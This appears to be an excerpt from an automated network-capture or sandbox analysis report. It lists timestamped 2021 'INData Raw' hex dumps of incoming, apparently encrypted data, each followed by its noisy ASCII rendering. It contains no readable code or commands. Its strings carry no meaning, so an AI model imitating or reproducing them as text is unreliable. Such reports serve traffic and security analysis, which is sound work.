                                                        Data Ascii: Iw>6^:3S"@%ChCrJ`9]C^0CAxS_=nB(n]sbLqd%Kb9V)TEDlfgA;Iu1]L+n`Ay-?QIN5:NyJczhu/#,1h?S@`~y}Fog_=]U]bJfy{7:e
                                                        2021-10-13 12:39:36 UTC107INData Raw: 15 23 db 1d 48 75 d1 99 9c 8b c9 83 4d e5 bd 19 a2 1e 43 7e 25 75 5f 87 e8 d0 70 79 58 54 f9 7b fb 83 10 c9 c5 4d 3d a0 74 a4 60 46 da 9b 7c 5e cd 5f 07 c3 89 43 cb 97 ae a3 b5 f1 e9 75 5c f0 6f 39 d4 56 7f df 2c 7d 26 3b b8 7d 84 77 91 92 c3 2c 89 cb 5c 9f ff 82 cd be e8 51 37 8b 1a ef ff d8 b0 e5 06 78 e3 e8 26 13 d2 a0 2f a7 51 26 f7 d3 2d ad 59 0c 60 24 ee 9a 42 80 9c 26 69 a5 31 dd cb eb 57 f6 d6 f5 b6 56 6c 16 db 30 f7 62 38 df 0d 45 92 02 e5 5f a8 a4 91 ec d1 c0 0d 3a 39 e9 9e 2f 83 0c 3d 56 9f fb 83 19 c9 69 e6 b0 01 8f 17 29 3d f9 5a 8d 8c 66 76 18 ee 63 25 ef eb 2e 1c 65 a4 b6 69 ad b6 9a 94 5f 51 86 08 b3 11 7a d8 88 11 71 1e ec 36 bc 2d 9d 95 f2 20 14 a2 14 21 f6 84 4b eb 78 b0 4a 47 33 00 43 c9 de 6b 25 d8 27 81 ce 0b 84 f6 04 1b dc b5 36 c0
                                                        Data Ascii: #HuMC~%u_pyXT{M=t`F|^_Cu\o9V,}&;}w,\Q7x&/Q&-Y`$B&i1WVl0b8E_:9/=Vi)=Zfvc%.ei_Qzq6- !KxJG3Ck%'6
                                                        2021-10-13 12:39:36 UTC108INData Raw: 36 08 52 54 d3 8b b4 ee 69 7d cd ec 9c 40 30 1b 61 09 9d 4a c7 83 b6 0b 84 84 78 7e 3f f9 3d 1f 87 ec e7 68 55 85 35 d0 68 ce 88 e2 ea f8 bc 8b b0 32 36 cb f8 15 a5 0b c3 e9 c5 00 13 94 45 1c e9 46 a2 9d f3 a8 2c fb 4f 7b 4b 3c b1 8f df 0c 5f 9a 83 c0 40 8d dd 15 eb c4 87 97 34 c4 03 bb 7c ec af 67 64 b6 93 18 16 56 68 4e 6a 35 cb 31 85 b3 04 53 3a 91 57 d4 fe f6 5c ca 38 27 8d 9b a6 03 d6 d2 24 f3 29 6a 2c f9 5e 9e 9e 17 43 a6 d7 5c 92 0e e8 37 b2 7c 64 24 08 91 58 0a 02 4c 79 7f d0 33 eb ee 2c cb bc 15 48 f3 dc 5c 1d a9 7b 9d d9 de 80 9f c7 d0 f2 ad fc 6b 8b 83 21 e0 5f a2 83 98 7c b8 41 9e 58 5a f3 02 97 2d 15 15 66 d9 8e 6d 0d 58 64 eb ab c4 62 61 be a9 92 bc 27 fa c2 8a 0d 01 52 dc dc 0f fa 4e d8 87 2d ea 56 aa 10 23 d9 1a cc 1d 4f 9b 9d 95 da f8 ca
                                                        Data Ascii: 6RTi}@0aJx~?=hU5h26EF,O{K<_@4|gdVhNj51S:W\8'$)j,^C\7|d$XLy3,H\{k!_|AXZ-fmXdba'RN-V#O
                                                        2021-10-13 12:39:36 UTC109INData Raw: 97 53 41 9d 2c de dd 51 fd 6b b9 12 c9 77 62 40 41 78 41 58 c6 bf 51 0a ec 7f 4a 2e f0 ee e6 1e 50 ab ff 8e cf 7c 0f f8 bf 3c ff 4d 90 9b 40 ca a0 cf 77 0f 83 86 58 60 56 81 81 4b 1c 00 5f 4f f1 0d 0f 5e c3 77 ba c3 bf 8e 41 8b 2f 67 76 8b 58 c9 86 5d 67 f4 2c 91 e7 74 ef 41 3a 17 00 4e 11 60 10 e3 f2 52 fb ca b4 0d d1 ab 09 63 bd a1 6c e2 8b 37 9b a2 bb 26 95 cb fc 5f 5c c9 dc 5c fc 66 6f 6b 96 ff e4 34 96 f8 0f 77 7e 3c 2b 87 ae 24 90 d8 8b 89 36 0f 4a fc e9 a6 96 49 ba 48 01 19 68 a7 15 67 7f 37 71 e4 78 59 19 5d 68 c9 68 4c cc 92 8f 15 42 40 af 63 21 43 c4 a4 d8 2c da c4 f0 0d d7 78 06 73 77 df e6 36 e8 21 ae 66 64 6c c6 ec 7b ed 2f 43 22 e1 28 13 4d 94 dc 53 b9 04 f0 67 3d 99 04 2e e8 a8 90 20 79 8d 1c 71 5a 8a 21 1d 40 54 ed 1a 9e 43 6f 6a 4a ec 88
                                                        Data Ascii: SA,Qkwb@AxAXQJ.P|<M@wX`VK_O^wA/gvX]g,tA:N`Rcl7&_\\fok4w~<+$6JIHhg7qxY]hhLB@c!C,xsw6!fdl{/C"(MSg=. yqZ!@TCojJ
                                                        2021-10-13 12:39:36 UTC111INData Raw: 5e c7 73 0b bd 3d 2e a0 9d bd a1 9f 53 85 7b 4d fc 50 3a c2 3f a2 8a 2c 77 21 f6 ba 66 5c ee 4e ba f4 2d a1 f6 4e 9a dd 86 b3 b0 ef 5b 1b dc ba ed f5 0c 3c 70 2c 78 e2 ff 12 8c d3 a2 25 93 55 0f aa 0d 52 af 48 04 1d 35 ef 9a 46 e5 ea 22 6b d5 eb 6a dd 26 ea de d6 59 b7 2b 7c f9 db 34 e4 31 31 db 0d 47 e8 aa 88 cc a0 a8 93 a5 6c b9 03 31 34 93 04 54 93 07 36 5b e6 82 87 ae ac 21 e0 9b 53 b8 13 3d 5a f8 5a 83 f1 36 19 8b ed 70 2b ce 82 bc c2 47 ac a2 7a ad b6 94 d7 fa 42 82 2a ad 7e 47 b6 19 2d 8c c0 ea 36 31 2d 9d 95 f6 0a 05 a6 36 f6 f3 92 67 82 91 f3 56 4d 5c 15 43 c9 d4 72 34 dc 48 f3 cd 0b 8e 39 2d fd df b9 30 be ce 25 2b a7 98 b4 3b bd 09 d2 95 0a f9 bc f7 06 cc 2f 1b 72 08 81 29 12 4c 1f d6 28 3a d5 59 62 0c 2f 97 9c 59 d7 8e e8 dd 5b df 83 b8 3a c5
                                                        Data Ascii: ^s=.S{MP:?,w!f\N-N[<p,x%URH5F"kj&Y+|411Gl14T6[!S=ZZ6p+GzB*~G-61-6gVM\Cr4H9-0%+;/r)L(:Yb/Y[:
                                                        2021-10-13 12:39:36 UTC112INData Raw: 8a 94 fc 64 e8 e9 11 88 ae c3 e9 be 43 05 83 67 6d eb 40 c7 57 e5 80 ca e9 55 6b 32 45 b7 8f d9 25 5e 8f 97 dd 40 78 df 15 e7 ca 82 cf 33 d6 44 2b 78 ec a3 7a eb b7 fc d5 15 42 76 40 58 8b a4 c5 8e a7 2a 95 2b 90 51 c8 5b a8 5e ca 3f 1b b7 8d 8e ad b9 af 2e db 32 67 2e f5 3d 5b 88 3f a6 bd db 40 92 ec 1b 36 b2 7b 61 08 0f 94 4e 28 fe 4f 51 68 77 22 e9 95 25 de 94 b7 71 44 d7 74 a7 81 69 92 f5 da a6 ae e8 d7 df 40 fe 04 90 94 ac ed 73 ae 8b a4 7c a9 69 30 70 7e f9 16 b5 d1 13 13 0f 02 01 6a 07 47 5d e5 a9 bf be c8 be af b0 81 9f fa c8 a8 7c b9 52 da fe 1b 96 b1 21 17 57 fe 7e 52 3c 1b dd 0c 4b 09 48 8c 8f 89 f6 bd e3 e7 bd 02 a9 14 56 69 74 3e 5d ee 4c fc 77 65 88 91 e5 6c 21 94 c4 3f de 4c 3d a5 78 b1 1c 40 b2 0a 05 69 c6 79 04 c3 f5 43 cb 97 67 b3 6a 89
                                                        Data Ascii: dCgm@WUk2E%^@x3D+xzBv@X*+Q[^?.2g.=[?@6{aN(OQhw"%qDti@s|i0p~jG]|R!W~R<KHVit>]Lwel!?L=x@iyCgj
                                                        2021-10-13 12:39:36 UTC113INData Raw: 5e 77 cd 71 6a 2d 5e 37 be 3b 0d 8a 24 ec 29 78 49 27 0a 1b a7 fa 6d ab bd 7f 91 60 7f 14 32 84 77 29 a0 99 54 a0 5b 04 95 f8 57 d0 46 2b 17 7e 6a 08 9e 10 a0 ac 6a 0a c0 68 25 3b b5 1a 6e 97 b7 4d fd 99 c9 db ea a8 2e 19 7c ff d1 c6 c0 c4 8a 2d 58 48 69 ae ff fb 27 89 f3 0f 66 75 23 35 79 ad 08 81 df a0 75 37 0f 66 ec ef c9 2d 4a ba 42 08 06 7b ac 15 76 74 28 64 1a 79 75 84 5b 07 35 71 4c ca 90 24 7b b5 41 a3 65 4e 96 c6 a4 d2 33 c0 d7 fb 0d 7f 72 19 68 13 de ca 3d c8 23 ac 66 74 7f c0 f3 67 fe 24 43 28 da 3e 21 46 97 f0 42 56 0d e8 a0 2b 02 3e 2a c0 b5 82 29 00 2e 2f 62 5b 99 36 07 59 4e 3b 9d b0 4e 78 78 d8 db e7 91 d4 1f 67 10 84 d4 cb 83 a7 01 8f bb 92 57 bb e9 2c 12 90 cd 1b ba c4 ec d9 5c 6f c8 97 cf ea f7 ad 9e ad 38 44 e5 d4 19 b5 a3 cd dd 91 0e
                                                        Data Ascii: ^wqj-^7;$)xI'm`2w)T[WF+~jjh%;nM.|-XHi'fu#5yu7f-JB{vt(dyu[5qL${AeN3rh=#ftg$C(>!FBV+>*)./b[6YN;NxxgW,\o8D
                                                        2021-10-13 12:39:36 UTC114INData Raw: 91 01 cc 11 cc 94 d0 65 f4 c3 11 32 70 22 b7 7c 46 37 8d fd ec 1e 4b ff cc ed 37 6c 27 cf bb 44 a3 4b ff 6d 69 31 a2 c8 1e 9c 3b 84 5e 05 ea 0f 80 41 01 f2 17 9b f3 07 0e ef 13 67 ab aa a2 83 5e c2 06 15 89 65 ac 08 a6 b2 77 ad 1b 80 ed 69 83 ba d6 f9 8a 6a 26 73 1a 8c b4 59 e4 ec 96 24 08 be 0e 0a 6b a7 46 e4 9a 30 b5 13 b9 26 9d d4 d1 4c 7a c9 cd 57 e8 4e 91 6a 82 f6 f5 3e 80 cb c3 68 57 2f 20 87 bd 2f 8f d5 31 88 1a 04 13 fd eb a6 fe 5b bf 57 19 0a 63 a7 04 6c 60 3d 8d e5 54 48 95 5f e6 7e 79 54 1a 48 43 ef 43 40 a5 7c 2a 50 cf a4 c9 27 c7 84 0e 0c 42 68 05 7a f5 09 ee 20 aa 27 86 7a 73 6c cc f3 3a fe 24 43 28 da 39 ed b9 ba d5 20 55 06 f0 70 28 0d 3c 25 e8 b8 88 36 35 cf 1d 5d 5b 9a 2e 1b 90 d1 d6 98 83 03 7a 76 c7 fa 83 77 f2 e1 60 23 82 ff 8c 7e 49
                                                        Data Ascii: e2p"|F7K7l'DKmi1;^Ag^ewij&sY$kF0&LzWNj>hW/ /1[Wcl`=TH_~yTHCC@|*P'Bhz 'zsl:$C(9 Up(<%65][.zvw`#~I
                                                        2021-10-13 12:39:36 UTC115INData Raw: a9 9a 89 5b 77 56 f8 6b 40 97 38 cd d9 2e 61 56 6c bc 6c 86 f9 7d ef 84 2c a1 f8 5f 9c 88 c8 b7 b0 ed 53 48 ac bb ed fb d6 53 a8 04 78 e8 fc 0b f1 9a a1 25 8f 57 3e f9 70 14 ae 48 00 1f 37 94 d2 47 82 89 4d 43 ce eb 60 b0 1e da dd d6 f5 b7 2b 5c 57 80 1c 63 19 36 d4 ba 3c d8 15 8a c8 a8 a6 e0 89 d2 bb 07 2c e3 fa 4a d9 b8 0d 3d 53 f4 af 86 ae a2 18 e6 b0 0b ba 25 57 33 7a 5b 89 85 87 19 8b fd 75 3c cc c4 48 c3 47 a6 cd 76 a9 a9 97 05 d7 7f 80 0a 8f 64 4d a3 73 ee 9f c5 fe e0 8a 01 8f 9d d8 63 52 a3 1e fb f5 44 1c ab 53 f1 52 58 3a 13 46 c9 cf 7c 3f 26 26 1b de 09 ff 79 04 1b d8 bb 4d 86 57 25 2f 77 fd d2 28 b8 03 c8 81 17 68 d6 db 0c c0 14 ba 8c 05 90 2f 22 58 0b d0 56 68 ca 53 96 d1 11 0a 42 4c f2 a4 a4 98 5a d5 94 bf 69 89 19 db 46 49 64 28 fc fe be 5b
                                                        Data Ascii: [wVk@8.aVll},_SHSx%W>pH7GMC`+\Wc6<,J=S%W3z[u<HGvdMscRDSRX:F|?&&yMW%/w(h/"XVhSBLZiFId([
                                                        2021-10-13 12:39:36 UTC116INData Raw: f2 c4 ea 04 af 60 a0 e1 5e 38 a3 f3 82 c0 ff 50 6b 4e bc b6 9e d2 12 5a 70 96 fb 65 30 d5 03 71 db 83 32 cc 2f 34 44 6b e1 a9 60 e4 ae 98 e6 16 6e 75 62 1b 62 34 ce 90 ab 3f b0 3e 80 5c dd 6b 0f 5d e6 34 22 9d 9e 87 95 33 d2 2e db 27 73 3f fe 52 87 87 20 b6 5c d6 76 83 97 c5 28 a9 6e 7a 20 08 98 51 32 0c 49 55 0c 66 f2 6c fa 38 de bc a9 48 f3 dc 5c ba aa 7b 91 ec 51 ac a7 c0 c5 c9 47 e9 6c 9b 93 0e f6 58 b5 8a a4 79 ac 69 3c fa 4b fe 0e b7 cf 1a 04 6b db 2b e9 0f 58 63 e9 32 d7 4a c9 bf bd 8c 80 b6 52 c2 80 2f 93 43 dc d6 3f 36 a0 20 6b 2c ef 78 4c 00 3a 52 23 41 1a 4e 88 94 90 c6 fa f5 7b ac 1b b9 01 b1 4f 7d 26 4e 1d 93 f6 60 47 fe 89 3d 71 dd 9c 03 a1 c6 4c 2c a9 74 ae f4 50 99 24 6f 55 d3 51 83 ae 3b 47 dc 10 ba ab b2 9f 48 7b 4d f6 6a 2c d5 21 57 f5
                                                        Data Ascii: `^8PkNZpe0q2/4Dk`nubb4?>\k]4"3.'s?R \v(nz Q2IUfl8H\{QGlXyi<Kk+Xc2JR/C?6 k,xL:R#AN{O}&N`G=qL,tP$oUQ;GH{Mj,!W
                                                        2021-10-13 12:39:36 UTC118INData Raw: 27 80 4b 16 3b 48 4d f1 2a 04 80 e9 ce ab ac 65 98 4a aa 0e 1e 8e 63 59 16 bc 4e 6e 8a 17 96 f1 8b c2 61 29 11 7e 75 16 78 ef 8d 89 50 d0 c2 43 c6 26 d4 42 64 97 a2 29 f5 89 37 d0 ec 8d 39 8f 46 d7 5f 71 c8 5c 10 f6 66 6b 41 b0 ec d4 31 9a 5f 0f 77 7e c7 2b 87 bd 32 83 dd e4 ca 36 1e 65 e5 17 a7 d4 46 b8 27 da 19 68 ad 0d 3a 69 19 41 fd 6b 5c 92 4d 6d d0 8e 4d e0 97 38 3e 58 53 a6 63 30 46 d3 5a d9 00 db dc e3 08 6e 68 03 65 13 de ca 35 ac 30 ab 66 63 69 dc 12 7a c1 2d 68 3b fa 9a 11 d7 5b dc 53 5f 68 d3 76 23 14 2f 2e e8 a9 c3 72 29 31 1c 71 50 99 27 fc 79 19 ed 0a 9c 43 63 ca d0 3d 05 43 d5 1f 60 04 9d c0 4e 34 a1 d0 83 94 61 7d b5 fb 34 0d 4b dc 63 9f 55 83 28 51 68 c7 80 c3 fa fe ad 8f 8e c0 b8 e4 f2 3d 42 ab d2 e7 4d 1d 12 55 60 b8 f8 42 99 43 e0 aa
                                                        Data Ascii: 'K;HM*eJcYNna)~uxPC&Bd)79F_q\fkA1_w~+26eF'h:iAk\MmM8>XSc0FZnhe50fciz-h;[S_hv#/.r)1qP'yCc=C`N4a}4KcU(Qh=BMU`BC
                                                        2021-10-13 12:39:36 UTC119INData Raw: 04 9f d4 a2 0d 96 50 30 fb 25 7a af 48 0e 6e b8 ee 9a 40 91 84 33 77 e7 c9 6f dc 3b b5 5a d7 f5 b1 06 7b 03 d1 e9 cf 11 36 de 25 0a 9a 14 80 dd a3 b2 b3 e9 d6 bb 05 54 b3 ec 9c 52 fc 90 3d 52 83 e6 af e5 a7 32 ec a1 02 bf 3d 76 36 f8 5c e6 0f 71 19 8d 83 fe 2f c9 f6 2f d3 43 ae a2 90 ad b6 98 f6 c7 54 92 2a 4a 7f 47 b6 61 63 89 c0 e0 1f 98 33 8c 81 cc 30 31 a7 1e f9 54 83 7f f9 46 e5 7e ef 33 00 49 d8 d9 6d 0d 37 23 37 c9 1c 09 39 05 1b dd aa 29 d1 49 33 03 8b f2 c9 3d 1f 12 c6 90 18 82 ff 5f 06 c6 08 ac ec 06 90 25 16 f1 0e d0 4d 54 18 58 68 d0 21 89 6a 88 f1 a6 d9 ca d6 d2 90 bd 13 dc 38 ca 62 57 64 a2 eb c7 bf 5a 80 a6 5d 5e 3c 8b c6 4f 1e 5a fe c7 87 0d 6e 0b ef a5 de 72 4c 90 90 7b 10 b5 ee 67 76 b6 bb 58 6a 38 af 91 6a 02 3c 6c 67 59 07 04 8a fd 4e
                                                        Data Ascii: P0%zHn@3wo;Z{6%TR=R2=v6\q//CT*JGac301TF~3Im7#79)I3=_%MTXh!j8bWdZ]^<OZnrL{gvXj8j<lgYN
                                                        2021-10-13 12:39:36 UTC120INData Raw: 33 55 6b c6 53 b9 d3 27 13 b6 08 aa 16 3d 51 c2 79 d7 4d ee 2f a3 b5 84 9f 89 c0 48 06 ca 38 6a 26 e0 43 87 ae 28 3c 8e f5 4b a7 94 75 1f a3 7d 77 2a c9 87 4e 22 e9 60 6d 79 72 28 c7 c2 39 df 9e c9 5a f3 d6 6f 27 e5 7a 97 f1 a2 e7 a6 c0 c0 d0 9d 0e 69 8d 95 89 cf 68 a2 82 86 7b be 7d 3c 70 62 f9 16 b5 01 f3 17 60 cf 01 42 2a 5d 65 f9 97 f4 4a c9 b4 81 a9 94 9e f0 fb 49 27 bb 52 ca 5b 1e 94 b1 26 6b 31 fc 56 7f 11 23 d9 24 65 1a 4f 91 ef 72 cf ec e4 f4 a9 02 ba 79 dc 5f 75 38 36 68 80 fe 7d 7c 77 b1 33 7a fb 83 00 97 e3 a6 3f a4 61 34 20 51 b5 13 6d 42 d6 65 14 84 13 45 cb 9b ab 26 b5 9e 5b 76 48 ee 68 15 7b 39 cd d7 04 5f 2e 2a bb 7a aa 10 69 92 c9 3c bd e8 75 b7 f1 80 b0 a6 64 56 33 e4 bb f9 eb c6 14 de 06 78 e8 d6 27 89 d3 a6 33 a3 be 32 fd 07 76 43 4a
                                                        Data Ascii: 3UkS'=QyM/H8j&C(<Ku}w*N"`myr(9Zo'zih{}<pb`B*]eJI'R[&k1V#$eOry_u86h}|w3z?a4 QmBeE&[vHh{9_.*zi<udV3x'32vCJ
                                                        2021-10-13 12:39:36 UTC121INData Raw: 62 4a d8 ae 09 63 80 c9 92 e0 8b 3d b5 3a ba 26 91 dc 93 8b 73 c9 d6 33 09 67 6f 6d bd f0 fb 2b 89 ef 0f 66 69 23 31 79 ad 08 be c9 dd e6 ca 0e 60 fb ff c9 2c 4a ba 42 78 e5 69 a7 13 70 10 e3 71 e4 72 36 6e 5d 68 cf 67 23 18 90 2c 1e 2d be a2 63 27 50 d7 bb c3 3f cf c4 e1 1a 79 87 07 5f ee c7 f5 21 bb 32 b9 79 64 92 c7 c0 74 e5 07 d1 38 d1 2b 29 b6 97 dc 53 4a 13 e3 61 23 05 38 31 e6 57 82 05 1a 19 30 74 50 9f 54 8b 47 40 cf 8f 9b 5c 66 6e d0 eb 99 7f ca 14 9f 0e a7 d7 d1 86 9e 1c 92 90 6a 6c 8c f8 3d 15 8c c8 1f 7b 55 92 35 42 78 30 89 cf e9 ed a9 a7 34 24 ba ee c2 d6 a4 a9 d2 f2 c9 07 12 83 7c a6 f6 49 56 9b cb 8f d1 f8 5e 75 32 39 b7 8f d5 1e 42 91 87 c4 7f 21 cc 02 fe f1 52 cc 1f ce 3a 5f 69 e6 c6 9e eb b1 99 77 9d 43 7c 50 5a f2 40 30 8f ad 43 31 3f
                                                        Data Ascii: bJc=:&s3gom+fi#1y`,JBxipqr6n]hg#,-c'P?y_!2ydt8+)SJa#81W0tPTG@\fnjl={U5Bx04$|IV^u29B!R:_iwC|PZ@0C1?
                                                        2021-10-13 12:39:36 UTC123INData Raw: 80 ab a4 9f db c0 93 1f 39 39 eb 8f 58 82 0a 34 7a e0 eb 87 a4 c9 c5 e7 b0 0d ba 18 43 3e 97 a6 88 85 76 0f e4 38 61 2f c3 93 d8 c3 47 a0 da 08 78 b4 9e f1 b9 af 87 02 a3 6c 28 64 74 ee 84 af 1e 1f 8b 2b 8e 90 cb 15 7b 5e 1f ff f0 84 0e 39 50 f1 5c 28 cf 01 43 cf c6 16 f1 da 27 3d a0 f5 85 3e 03 08 d2 a8 38 be 1a 24 2b a9 e6 c6 13 a1 01 d9 82 1f 9d a4 d5 04 c6 04 97 bc 15 80 27 51 63 0c d0 41 7c c5 48 64 f8 05 98 42 4a da 88 dd dd 5d fd 7e bf 12 c5 77 ff 40 41 74 3f c4 d6 b4 73 0f b2 7d 4c 00 b1 ec e7 18 72 1a d1 af c3 02 2d eb b2 55 64 5c 93 fe 42 33 a4 c9 77 71 2a eb 40 6b 39 07 5e 44 33 00 4f 4f f1 0d 17 94 c1 5e ab ac 7e 50 41 90 1f 09 5f 67 ad 06 9a 5d 61 bf 62 6f 18 8a d2 58 3c d0 66 60 00 75 00 9a 2b e5 c4 2b 95 da db a9 23 65 d6 92 46 e2 8b 37 da
                                                        Data Ascii: 99X4zC>v8a/Gxl(dt+{^9P\(C'=>8$+'QcA|HdBJ]~w@At?s}Lr-Ud\B3wq*@k9^D3OO^~PA_g]aboX<f`u++#eF7
                                                        2021-10-13 12:39:36 UTC124INData Raw: 55 63 20 19 9f 66 1a f3 48 73 0d 60 22 ef e1 c6 d4 94 bd 3c e1 d6 74 bc a2 7c 9d 2b cc 8e 8f f7 c4 da 4a f5 7f 87 bd 94 e7 5f a8 5c 8c 6e 86 69 77 44 5a f9 16 bf dc 11 15 60 cf 03 73 0c 58 65 e6 be d0 4a d9 be a9 98 8e 9e fa c3 da 27 45 47 90 d6 35 96 b3 24 05 51 ff 7e 5c 16 27 a2 70 40 1a 4b b1 9c 92 fe e8 e2 0d bd 13 ae 1e 2c 5e 64 3c a7 94 cf fe 77 6d 50 f7 08 7b fb 87 6f cc ca 4c 39 a6 bb f5 0a 51 b7 20 6a 5e c7 73 28 a8 3a 41 c1 e0 c0 aa b2 9a 58 63 a2 fb 6a c3 d2 33 cb f1 01 75 28 a4 0a 11 02 fa 6b 96 c1 2f da 7c 5c 9f f1 a8 ed b2 e9 5b 4e 9b bb ed fb d1 2a 74 7d 07 e3 fe 0a 8e a8 20 24 8b 51 18 0d 0f 5e a5 4c 10 e3 34 f9 64 47 89 8a 0e 53 cd ef e4 6b 40 58 dc d6 f1 b5 29 07 95 da 34 f1 31 6d dc 0d 4b e6 95 8b cc ae a0 8d c8 a8 3a 02 3b 3d ef e7 d6
                                                        Data Ascii: Uc fHs`"<t|+J_\niwDZ`sXeJ'EG5$Q~\'p@K,^d<wmP{oL9Q j^s(:AXcj3u(k/|\[N*t} $Q^L4dGSk@X)41mK:;=
                                                        2021-10-13 12:39:36 UTC125INData Raw: 2a 4d f4 cf b1 ee 50 92 65 15 19 6e 8d 43 19 e6 36 73 e0 60 c3 b7 71 62 ef 68 54 d3 81 04 39 40 40 a5 49 7b 3d 5d a5 d8 28 c1 5e d5 20 65 5f 1f 6c f8 c0 f5 1e 96 21 ae 60 58 3a b8 75 7a ed 2b 59 a3 f4 0c 19 9e 8c c3 7b 4f 2c dd 74 23 12 05 78 96 30 82 29 0e 2a 86 54 7d 93 01 17 59 6c df b4 b1 41 69 7b ed b1 f6 f1 d4 1f 65 13 11 e2 ed 88 90 16 8f a0 73 5a bf d4 3f 15 95 ee 56 12 cc 82 22 59 72 54 ad ce f2 da b0 90 9a 3a b5 cc d5 17 a4 af f8 b7 af 8d 04 83 69 af 73 63 85 91 c1 9e df b4 50 70 75 9c b4 8f d9 27 29 f0 0e d6 68 25 c2 1c 7b c7 81 c1 15 cf 22 49 20 f3 a5 59 c4 b3 93 1e 3d 20 02 c3 43 9d cf 2e 85 3d 09 90 32 b7 4e c8 6c 95 43 c1 11 1e 9b 8f 88 81 88 ac b7 da 38 6e 33 f8 c8 b3 a7 34 8a bd dc 45 ea 9a c7 1a b0 7d 71 0a 7b eb d7 23 f2 4c 66 75 e8 07
                                                        Data Ascii: *MPenC6s`qbhT9@@I{=](^ e_l!`X:uz+Y{O,t#x0)*T}YlAi{esZ?V"YrT:iscPpu')h%{"I Y= C.=2NlC8n34E}q{#Lfu
                                                        2021-10-13 12:39:36 UTC127INData Raw: 67 b4 9e b3 f9 d6 55 ac 68 db e2 46 b0 72 f1 bd 5a c5 33 85 0b 82 ac fa 67 16 a2 1e e6 de bf 63 ed 54 db 3c 39 aa 01 43 cd c1 4d bf fd 0a 39 e9 14 b0 1e 87 19 dc b9 2d e8 7b 27 2b ab dd a7 45 24 02 d9 80 13 a3 4d d2 2b c9 24 9b 99 24 17 2d 3e 4b 11 da 6f 40 d7 59 6e fa 46 e3 db 4d f2 a2 c0 eb c1 f0 bd b2 34 d0 2e fb d3 43 72 2e cb cd 97 76 20 b7 7b 60 42 e1 77 e6 1e 5e eb e4 35 ec 40 05 cf ad 64 55 d7 92 91 68 2f 8c e2 73 60 3c ae 32 14 a0 0c 80 4f 09 10 e2 6a dc 09 22 9f d1 46 08 ae 74 8e 59 a9 38 1c 89 72 8d 7d ee d5 77 81 13 8e de ef e6 60 25 20 6a 4c 31 c5 13 8c a5 4b d3 ed 6a 25 22 85 63 1b 0e a7 46 e6 94 0d 40 e3 96 28 b1 d4 c6 7f d9 cb dc 5c ec 4e 42 69 ae f9 ce 5e e4 61 0e 77 7a 23 10 1d 89 09 9e fe d0 b2 16 a2 62 fd e9 ba d0 65 b8 48 11 33 02 d9
                                                        Data Ascii: gUhFrZ3gcT<9CM9-{'+E$M+$$->Ko@YnFM4.Cr.v {`Bw^5@dUh/s`<2Oj"FtY8r}w`% jL1Kj%"cF@(\NBi^awz#beH3
                                                        2021-10-13 12:39:36 UTC128INData Raw: 69 32 47 38 63 33 92 d3 37 0a 02 ef 52 6e 0d 58 7a ea 97 fd 48 c9 b8 83 f6 ea 07 fb c2 84 3a d8 c8 f9 fb 3a b2 ae 44 58 4c fa 7e 58 0b 2e f7 21 43 1a 49 b1 f2 ff 57 ed e2 e3 a2 77 34 33 00 51 53 21 3d a1 f1 fa 77 6f 4d 86 15 56 f9 83 14 98 a5 32 a4 a5 6b bc 15 34 2f 2d 53 51 e1 66 65 8c b9 45 cb 9d a2 a2 9a b3 59 77 5a d0 12 43 4a 38 cd d9 33 11 b1 0f 90 63 a4 e4 0d b2 48 29 a1 fc 42 bf dd ad b4 b0 ef 7b 59 9a 23 ec ff d6 23 11 9c 5d cf f0 28 93 b4 80 8e 8f 55 30 e1 25 73 ad 48 02 37 5b 91 03 47 82 89 3d 16 55 ce 47 d3 1b c5 b5 f6 44 b3 2b 7c 08 cb 1c d8 1b 36 d8 27 2b e5 8d 8b cc ae bb f2 50 f6 96 0d 1d 26 84 bc 95 97 0d 3d 49 a1 c7 85 ae a0 18 88 ce 92 a8 15 56 2c 92 c0 ac a8 7f 3f 94 86 43 e9 cd fc 24 dd 48 8e e0 65 ac b0 b4 91 a8 ca 87 02 a1 64 2c 2a
                                                        Data Ascii: i2G8c37RnXzH::DXL~X.!CIWw43QS!=woMV2k4/-SQfeEYwZCJ83cH)B{Y##](U0%sH7[G=UGD+|6'+P&=IV,?C$Hed,*
                                                        2021-10-13 12:39:36 UTC129INData Raw: 02 53 63 df e6 36 21 06 83 74 54 4c 48 ec 7b ed 0f 5a 3e d1 21 0c aa be f1 51 55 02 da f0 5d 8d 2e 2e ec 89 0c 29 0a 31 86 54 7d 8b 01 2c c9 40 c5 9c bc 68 6e 7d c7 f4 b9 40 f8 1d 61 09 a1 45 be 1a b7 0a 94 b0 fc 56 97 f9 a7 30 be d5 2a 4c c5 83 22 5d 4f 92 8f e3 f9 e6 85 a2 a4 25 bc ce 7e 6b 3d a8 d2 e9 f1 85 05 83 6d 2b cc 6b ba bc c7 11 c0 ff 4f 5d 3d b6 b6 8f c0 21 63 a3 95 d7 6e 0b 5f 6b 78 e3 ac c9 13 42 2b 56 78 76 8c 5c f8 97 b3 8a 17 42 7c 7a ce 9a cb 31 95 8f 01 bf 3e 97 7b 40 0d 68 5d ca 3d 13 0a 8f 8e ab 4c f7 03 ca 1e 4a bf f3 52 96 aa af ab a2 d7 40 ad ae ed 37 b4 57 f5 5e 80 94 4e 26 d2 dc 79 79 72 b8 ca d7 29 f9 b4 29 48 f3 d6 54 33 ae 7b 97 ed f4 86 a5 c0 c2 f0 c2 86 f2 8c 95 a8 c7 ca a2 82 8c f2 89 44 27 7e 7a 6c 16 bf dc 31 83 67 cf 03
                                                        Data Ascii: Sc6!tTLH{Z>!QU]..)1T},@hn}@aEV0*L"]O%~k=m+kO]=!cn_kxB+Vxv\B|z1>{@h]=LJR@7W^N&yyr))HT3{D'~zl1g
                                                        2021-10-13 12:39:36 UTC130INData Raw: 1d 48 03 15 67 7f ad 56 c9 69 7f b2 f8 68 c9 70 6c 32 95 2c 14 55 68 8e 61 21 45 ee 22 a6 b5 d9 c4 f4 2d cb 79 06 73 77 fa cb 24 9d 03 0b 66 72 6c e6 13 7c ed 2f 5c 22 f9 0c 11 b8 90 f6 d5 2b 9d f1 76 27 34 89 2e e8 a9 19 0c 27 23 3a 51 f6 99 27 0c 66 5a cd 9c 9c 5c 62 55 ea e9 88 6e ff 99 1f 96 8a c7 c4 a3 11 0a 90 90 f6 73 ba eb 1b 35 34 c4 0c 6c 75 a6 2a 5d 6f d1 91 cb d4 fe ad 89 8c a3 c4 7d f9 15 a0 89 7a ed d1 14 9f a6 40 a3 cf 66 00 9a e7 80 e0 c1 47 7d 5d ae bf a7 f2 0f 4b 88 bd 51 16 b8 dc 15 e5 c2 05 cd 33 d0 b1 73 55 fe 8f 51 40 b1 93 18 37 05 74 5a 42 82 db 19 a2 